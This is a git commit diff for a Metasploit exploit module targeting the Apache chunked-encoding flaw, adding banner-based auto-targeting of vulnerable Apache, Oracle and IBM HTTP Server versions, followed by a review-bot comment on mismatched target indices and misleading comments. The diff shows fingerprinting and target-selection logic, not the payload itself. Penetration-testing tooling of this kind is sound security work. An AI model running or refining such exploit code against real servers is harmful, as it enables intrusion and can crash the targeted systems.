add auto_target to apache_chunked exploit - should reduce run duration in most cases
git-svn-id: file:///home/svn/framework3/trunk@8980 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
776259e3c6
commit
eb003518ce
|
@ -9,10 +9,8 @@
|
||||||
# http://metasploit.com/framework/
|
# http://metasploit.com/framework/
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = GoodRanking
|
||||||
|
|
||||||
|
@ -35,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
automatically restart, so if you use the wrong target value,
|
automatically restart, so if you use the wrong target value,
|
||||||
the server will crash.
|
the server will crash.
|
||||||
},
|
},
|
||||||
'Author' => 'hdm',
|
'Author' => [ 'hdm', 'jduck' ],
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
@ -194,12 +192,82 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return code
|
return code
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def auto_target
|
||||||
|
response = send_request_raw({'uri' => '/'}, 5)
|
||||||
|
targets_to_try = []
|
||||||
|
|
||||||
|
if response.nil?
|
||||||
|
print_error("No response to request")
|
||||||
|
return targets_to_try
|
||||||
|
end
|
||||||
|
|
||||||
|
server_hdr = response['Server']
|
||||||
|
print_status("Server: #{server_hdr}")
|
||||||
|
|
||||||
|
case server_hdr
|
||||||
|
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
|
||||||
|
targets_to_try.push(targets[9])
|
||||||
|
|
||||||
|
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
|
||||||
|
targets_to_try.push(targets[10])
|
||||||
|
|
||||||
|
when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
|
||||||
|
targets_to_try.push(targets[11])
|
||||||
|
|
||||||
|
when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
|
||||||
|
# fall through
|
||||||
|
|
||||||
|
else
|
||||||
|
# check for apache version ranges
|
||||||
|
if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
|
||||||
|
version = $1
|
||||||
|
|
||||||
|
#print_status("Apache version: #{version}")
|
||||||
|
ver = version.split('.')
|
||||||
|
if (ver.length == 3)
|
||||||
|
major = ver[0].to_i
|
||||||
|
minor = ver[1].to_i
|
||||||
|
rev = ver[2].to_i
|
||||||
|
if (major == 1 and minor == 3)
|
||||||
|
targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
|
||||||
|
targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
|
||||||
|
targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
|
||||||
|
targets_to_try.push(targets[4]) if (rev == 22)
|
||||||
|
|
||||||
|
# Add the remaining targets, regardless of quality...
|
||||||
|
if (server_hdr =~ /Win32/)
|
||||||
|
# targets 4, 5, 6, 7
|
||||||
|
if (rev >= 17 and rev <= 24)
|
||||||
|
targets_to_try.push(targets[5])
|
||||||
|
targets_to_try.push(targets[6])
|
||||||
|
end
|
||||||
|
targets_to_try.push(targets[7])
|
||||||
|
targets_to_try.push(targets[8])
|
||||||
|
end
|
||||||
|
end
|
||||||
|
# Version 1.0 - 1.2, Fall through...
|
||||||
|
end
|
||||||
|
# ServerTokens setting isn't giving up enough information ... Might need to try?
|
||||||
|
end
|
||||||
|
# Not Apache? Fall through...
|
||||||
|
end
|
||||||
|
|
||||||
|
targets_to_try
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# If auto, ask the auto_target function for a list of
|
||||||
|
# targets to try...
|
||||||
|
#
|
||||||
|
# If not auto, just try the selected target.
|
||||||
|
#
|
||||||
def exploit
|
def exploit
|
||||||
if target_index == 0
|
if target_index == 0
|
||||||
targets.each_with_index { |targ, idx|
|
targs = auto_target
|
||||||
next if idx == 0
|
print_status("Auto-targeting returned #{targs.length} candidates...")
|
||||||
|
targs.each_with_index { |targ, idx|
|
||||||
|
# Never try the debug target automatically :)
|
||||||
next if targ.name =~ /Debug/
|
next if targ.name =~ /Debug/
|
||||||
|
|
||||||
exploit_target(targ)
|
exploit_target(targ)
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
|
@ -257,4 +325,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
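Review bot: In `auto_target`, candidates are picked by bare position (`targets[1]` through `targets[11]`), and the comment `# targets 4, 5, 6, 7` in the Win32 branch does not match the code beneath it, which pushes indices 5, 6, 7 and 8. The module description visible in this diff says a wrong target value crashes the server, so an index that drifts when the target list is edited has a real cost for the system under test; the target list is outside the hunks, so whether the comment or the code is right needs confirming there. I would correct the comment to `# targets 5, 6, 7, 8` (or fix the indices) and select entries by name rather than by position. The `# fall through` comment under the `IBM_HTTP_SERVER` branch is also misleading, because a Ruby `case` does not fall through and that branch leaves the list empty; `# no candidates selected for this banner` describes what happens. In `exploit`, `idx` is unused now that `next if idx == 0` is gone, so `targs.each { |targ|` is enough.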